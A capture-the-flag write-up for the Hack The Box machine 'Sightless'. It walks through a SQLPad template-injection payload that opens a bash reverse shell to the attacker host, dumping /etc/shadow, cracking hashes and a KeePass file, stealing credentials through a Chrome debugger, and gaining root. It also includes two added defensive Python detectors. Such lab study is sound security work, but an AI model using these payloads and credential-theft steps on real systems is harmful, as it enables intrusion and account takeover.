Sightless
OS: Linux
Difficulty: Easy
Points: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.235.185 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -vvv -p "$ports" -sC -sV -oN nmap.txt 10.129.235.185
Nmap scan report for 10.129.235.185
Host is up, received echo-reply ttl 63 (0.33s latency).
Scanned at 2024-09-08 07:54:01 EDT for 77s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.235.185]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/8%Time=66DD9065%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,A3,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.129\.235\.185\]\r\n500\x20Invalid\x20command:\x
SF:20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
We identified the following subdomains.
10.129.235.185 sightless.htb sqlpad.sightless.htb
On the sqlpad subdomain we can see the application version.
Researching it, we found the following report.
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
SQLPAD - Template injection
We can confirm the vulnerability as follows.
{{ process.mainModule.require('child_process').exec('curl 10.10.14.147') }}
When we save the configuration, our payload is executed.
With the following payload we get a reverse shell.
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.14.147/1234 0>&1"') }}
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.235.185] 38144
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)
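A defender-side check for the template injection shown above, added here as an example (it is not from the writeup or from SQLPad itself): it scans the string fields of a saved connection definition for {{ }} expressions that reach Node internals such as process or require, which is the shape the payload above relies on. The field names and the watch-list of identifiers are assumptions.

```python
import re

# Handlebars-style expression blocks: {{ ... }}
EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)
# Identifiers that step out of the template into Node internals (assumed watch-list).
DANGEROUS = re.compile(
    r"\b(process|require|child_process|constructor|global|globalThis|mainModule|__proto__)\b"
)


def template_injection_findings(value: str) -> list:
    """Return the bodies of {{ }} expressions in `value` that reference Node internals."""
    findings = []
    for match in EXPR.finditer(value):
        body = match.group(1).strip()
        if DANGEROUS.search(body):
            findings.append(body)
    return findings


def audit_connection(conn: dict) -> dict:
    """Scan every string field of a connection definition; map field -> suspicious bodies."""
    report = {}
    for field, value in conn.items():
        if isinstance(value, str):
            hits = template_injection_findings(value)
            if hits:
                report[field] = hits
    return report


# Constructed samples (assumed field names): one benign connection and one whose
# database field carries the same expression shape as the payload above.
SAMPLE_BENIGN = {"name": "prod-pg", "host": "db.internal", "database": "app"}
SAMPLE_INJECTED = {
    "name": "test",
    "host": "127.0.0.1",
    "database": "{{ process.mainModule.require('child_process').exec('id') }}",
}

if __name__ == "__main__":
    print(audit_connection(SAMPLE_BENIGN))
    print(audit_connection(SAMPLE_INJECTED))
```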
Lateral Movement
We find a pair of hashes in the shadow file.
root@c184118df0a6:~# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
The hash for the user michael can be cracked.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
insaneclownposse (michael)
1g 0:00:00:46 DONE (2024-09-08 08:52) 0.02173g/s 1280p/s 1280c/s 1280C/s kruimel..bluedolphin
Use the "--show" option to display all of the cracked passwords reliably
We can connect over SSH with those credentials.
michael : insaneclownposse
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh michael@sightless.htb
michael@sightless.htb's password:
Last login: Sun Sep 8 12:54:49 2024 from 10.10.14.147
michael@sightless:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael)
michael@sightless:~$ cat user.txt
4d30c8152d162ea36ccba77c21152aa9
michael@sightless:~$
Privilege Escalation
We see local port 8080 open, as well as other ports such as 42205/42467.
michael@sightless:~$ netstat -alnp | grep "LISTEN "
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:59833 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:42205 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:42467 0.0.0.0:* LISTEN -
Investigating, the high ports appear to belong to chromedriver.
john 1616 0.0 0.5 33660 23348 ? S Sep07 0:33 /usr/bin/python3 /home/john/automation/administration.py
john 1617 0.3 0.3 33630172 14320 ? Sl Sep07 3:42 /home/john/automation/chromedriver --port=59833
john 1622 0.0 0.0 0 0 ? Z Sep07 0:00 [chromedriver] <defunct>
john 1628 0.6 2.7 34019584 109000 ? Sl Sep07 6:32 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --d
john 1630 0.0 0.0 33575860 3104 ? Sl Sep07 0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=http
john 1634 0.0 1.2 34112452 47764 ? S Sep07 0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless -
john 1635 0.0 1.2 34112456 47984 ? S Sep07 0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pi
john 1652 0.4 3.2 34366848 128644 ? Sl Sep07 4:23 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-an
john 1653 0.1 1.9 33900068 77912 ? Sl Sep07 1:21 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=no
john 1681 3.0 5.9 1186800240 237656 ? Sl Sep07 29:26 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1630 --no-sandbox --disable-dev-shm-usage --enable-
john 1705 0.0 0.0 7372 2800 ? S Sep07 0:00 /bin/bash /home/john/automation/healthcheck.sh
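An added audit script (not part of the original writeup or of the box) that ties the two listings above together: it parses ps and netstat output and reports chromedriver or Chrome debugging ports that are actually bound on localhost, where every local account can reach them. The sample lines are constructed from the listings above; the --remote-debugging-port flag on the Chrome line is an assumption, since the page's command line is truncated.

```python
import re
from dataclasses import dataclass

# Constructed sample lines, shaped like the `ps aux` and `netstat -alnp` output above.
PS_LINES = [
    "john 1616 0.0 0.5 33660 23348 ? S Sep07 0:33 /usr/bin/python3 /home/john/automation/administration.py",
    "john 1617 0.3 0.3 33630172 14320 ? Sl Sep07 3:42 /home/john/automation/chromedriver --port=59833",
    # Assumed flag: the real command line in the listing is cut off.
    "john 1628 0.6 2.7 34019584 109000 ? Sl Sep07 6:32 /opt/google/chrome/chrome --headless --no-sandbox --remote-debugging-port=42467",
]
NETSTAT_LINES = [
    "tcp 0 0 127.0.0.1:59833 0.0.0.0:* LISTEN -",
    "tcp 0 0 127.0.0.1:42467 0.0.0.0:* LISTEN -",
    "tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -",
]

PORT_FLAG = re.compile(r"--(?:remote-debugging-)?port=(\d+)")
LISTEN = re.compile(r"^\S+\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN")


@dataclass
class Finding:
    user: str
    pid: int
    binary: str
    port: int
    no_sandbox: bool  # Chrome running with --no-sandbox widens the impact of any abuse


def listening_ports(netstat_lines):
    """Map port -> bind address for every LISTEN socket in netstat output."""
    ports = {}
    for line in netstat_lines:
        m = LISTEN.search(line)
        if m:
            ports[int(m.group(2))] = m.group(1)
    return ports


def audit_debug_endpoints(ps_lines, netstat_lines):
    """Report chromedriver/Chrome debug ports that are both configured and bound."""
    bound = listening_ports(netstat_lines)
    findings = []
    for line in ps_lines:
        parts = line.split(None, 10)  # user pid %cpu %mem vsz rss tty stat start time cmd
        if len(parts) < 11:
            continue
        user, pid, cmd = parts[0], int(parts[1]), parts[10]
        binary = cmd.split()[0]
        if not (binary.endswith("chromedriver") or binary.endswith("/chrome")):
            continue
        for port in map(int, PORT_FLAG.findall(cmd)):
            if port in bound:  # only flag ports that are really listening
                findings.append(Finding(user, pid, binary, port, "--no-sandbox" in cmd))
    return findings
```

Each finding is a debugging endpoint owned by one user but reachable from any local session, which is the exposure the writeup goes on to use.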
We will port-forward those ports over SSH.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh michael@sightless.htb -L 8081:127.0.0.1:8080 -L 42467:127.0.0.1:42467
michael@sightless.htb's password:
Last login: Sun Sep 8 12:58:00 2024 from 10.10.14.147
michael@sightless:~$
Using the following blog post as a guide, we configure Chromium to reach the debug ports.
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/
chrome://inspect/#devices
We will see the following and click on inspect.
A window opens in which the login action is being performed constantly. To capture the credentials, select Network -> Preserve Log. Wait for it to authenticate and then click the stop recording network log icon.
We obtain the credentials to authenticate.
admin : ForlorfroxAdmin
After enumerating a little more, we identify the following files.
michael@sightless:/var/customers/webs$ find / -name '*froxlor*' 2>/dev/null
/var/customers/tmp/froxlor.panel
/etc/proftpd/conf.d/99-froxlor-ratelimit.conf
/etc/ssl/froxlor_selfsigned.pem
/etc/ssl/froxlor_selfsigned.key
/etc/apache2/froxlor-htpasswd
/etc/apache2/sites-enabled/10_froxlor_ipandport_192.168.1.118.80.conf
/etc/apache2/sites-enabled/34_froxlor_normal_vhost_web1.sightless.htb.conf
/etc/apache2/sites-enabled/05_froxlor_dirfix_nofcgid.conf
/etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
/etc/cron.d/froxlor
Among the most important is the following one.
michael@sightless:/var/www$ cat /etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
# 40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
# Created 03.09.2024 11:55
# Do NOT manually edit this file, all changes will be deleted after the next domain change at the panel.
<Directory "/var/customers/webs/web1/goaccess/">
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
require valid-user
</Directory>
The .htpasswd file is where the credentials used to connect over FTP are stored.
michael@sightless:~$ cat /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
web1:$2y$10$X5tjC19boiHf81unjwyFFuELwOVBDyEJMlm/eG9Ks6qpxli/L3Cii
From the web panel we can change the password of the user web1.
We connect over FTP as follows.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# lftp -u web1 sightless.htb
Password:
lftp web1@sightless.htb:~> set ssl:verify-certificate off
lftp web1@sightless.htb:~> ls
drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
lftp web1@sightless.htb:/> cd goaccess
lftp web1@sightless.htb:/goaccess> ls
drwxr-xr-x 2 web1 web1 4096 Aug 2 07:14 backup
lftp web1@sightless.htb:/goaccess> cd backup
lftp web1@sightless.htb:/goaccess/backup> ls
-rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
lftp web1@sightless.htb:/goaccess/backup> get Database.kdb
5292 bytes transferred in 2 seconds (2.9 KiB/s)
lftp web1@sightless.htb:/goaccess/backup> exit
The kdb file needs to be cracked, so we use the following tool.
keepass2john Database.kdb > hash.txt
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs (Database.kdb)
1g 0:00:01:56 DONE (2024-09-08 11:12) 0.008553g/s 8.895p/s 8.895c/s 8.895C/s kucing..pisces
Use the "--show" option to display all of the cracked passwords reliably
Now we can open the file, and we see the RSA key in the attached document.
With this key we connect over SSH.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# chmod 400 root-rsa
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh -i root-rsa root@sightless.htb
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~# cat root.txt
f2ce803a8947775873b6d9873c8be297
root@sightless:~#
References
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/